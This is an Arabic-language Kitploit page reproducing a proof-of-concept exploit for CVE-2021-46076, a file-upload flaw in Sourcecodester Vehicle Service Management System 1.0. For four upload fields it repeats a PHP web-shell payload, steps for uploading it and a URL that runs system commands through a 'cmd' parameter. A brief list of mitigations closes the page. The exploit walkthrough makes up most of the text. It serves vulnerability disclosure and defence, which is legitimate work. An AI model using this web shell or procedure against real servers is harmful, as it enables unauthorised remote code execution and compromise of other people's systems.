Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Code-Execution — CVE-2021-46076 - Sourcecodester Vehicle Service Management System 1.0 عرضة لثغرة رفع الملفات. يمكن للمهاجم رفع ملف PHP خبيث عبر نقاط نهاية متعددة مما يؤدي إلى تنفيذ التعليمات البرمجية. | Kitploit
أدوات / GitHub / sanupl / vehicle-service-management-system-multiple-file-upload-leads-to-code-execution
sanupl/vehicle-service-management-system-multiple-file-upload-leads-to-code-execution Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Code-Execution اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.
آخر 7 أيام آخر 30 يومًا
CVE-2021-46076 - Sourcecodester Vehicle Service Management System 1.0 عرضة لثغرة رفع الملفات. يمكن للمهاجم رفع ملف PHP خبيث عبر نقاط نهاية متعددة مما يؤدي إلى تنفيذ التعليمات البرمجية.
4 منذ 4 أشهرCVE-2021-46076
عنوان الاستغلال: نظام إدارة خدمة المركبات - رفع ملفات 'متعدد' يؤدي إلى تنفيذ الأكواد
CVE: CVE-2021-46076
CVSS: 8.8 عالية
المراجع:
الوصف:
نظام إدارة خدمة المركبات من Sourcecodester الإصدار 1.0 عرضة لثغرة رفع الملفات. يمكن للمهاجم رفع ملف php خبيث عبر نقاط نهاية (endpoints) متعددة مما يؤدي إلى تنفيذ الأكواد.
1. نظام إدارة خدمة المركبات - 'حسابي' (/admin/?page=user)
الاستغلال:
الحمولة: <?php system($_GET['cmd']);?>
احفظ كود php أعلاه، على سبيل المثال: Cmd.php
في قسم حسابي، أدخل جميع التفاصيل المطلوبة واختر ملف php في حقل الصورة الرمزية (Avatar).
انقر على زر التحديث.
افتح الصورة الرمزية في تبويب جديد.
أضف معامل cmd إلى الرابط ونفّذ الأوامر.
الرابط النهائي: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
نفّذ جميع أوامر النظام، على سبيل المثال: id, whoami, pwd إلخ.
2. نظام إدارة خدمة المركبات - 'قائمة المستخدمين' (/admin/?page=user/manage_user)
الاستغلال:
الحمولة: <?php system($_GET['cmd']);?>
احفظ كود php أعلاه، على سبيل المثال: Cmd.php
في صفحة إنشاء مستخدم جديد، أدخل جميع التفاصيل المطلوبة واختر ملف php في حقل الصورة الرمزية (Avatar).
انقر على زر الحفظ.
افتح الصورة الرمزية في تبويب جديد.
أضف معامل cmd إلى الرابط ونفّذ الأوامر.
الرابط النهائي: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
نفّذ جميع أوامر النظام، على سبيل المثال: id, whoami, pwd إلخ.
3. نظام إدارة خدمة المركبات - 'الإعدادات - شعار النظام' (/admin/?page=system_info)
الاستغلال:
الحمولة: <?php system($_GET['cmd']);?>
احفظ كود php أعلاه، على سبيل المثال: Cmd.php
في قسم الإعدادات، أدخل جميع التفاصيل المطلوبة واختر ملف php في حقل شعار النظام (System Logo).
انقر على زر التحديث.
افتح صورة شعار النظام في تبويب جديد.
أضف معامل cmd إلى الرابط ونفّذ الأوامر.
الرابط النهائي: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
نفّذ جميع أوامر النظام، على سبيل المثال: id, whoami, pwd إلخ.
4. نظام إدارة خدمة المركبات - 'الإعدادات - غلاف الموقع' (/admin/?page=system_info)
الاستغلال:
الحمولة: <?php system($_GET['cmd']);?>
احفظ كود php أعلاه، على سبيل المثال: Cmd.php
في قسم الإعدادات، أدخل جميع التفاصيل المطلوبة واختر ملف php في حقل غلاف الموقع (Website Cover).
انقر على زر التحديث.
افتح صورة غلاف الموقع في تبويب جديد.
أضف معامل cmd إلى الرابط ونفّذ الأوامر.
الرابط النهائي: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
نفّذ جميع أوامر النظام، على سبيل المثال: id, whoami, pwd إلخ.
التأثير: يمكن للمهاجم رفع ملف php خبيث عبر نقاط نهاية (endpoints) متعددة، مما يؤدي إلى تنفيذ الأكواد.
التخفيف:
لا تقبل أبدًا اسم الملف وامتداده مباشرةً دون وجود مرشح قائمة بيضاء (white-list).
إذا لم تكن هناك حاجة لأحرف Unicode، يُنصح بشدة بقبول الأحرف الأبجدية الرقمية (alpha-numeric) ونقطة واحدة فقط كمدخل لاسم الملف والامتداد.
حدّد حجم الملف إلى قيمة قصوى لمنع هجمات حجب الخدمة.
يجب ألا يمتلك دليل الرفع أي صلاحية "تنفيذ".
لا تعتمد على التحقق من جانب العميل فقط.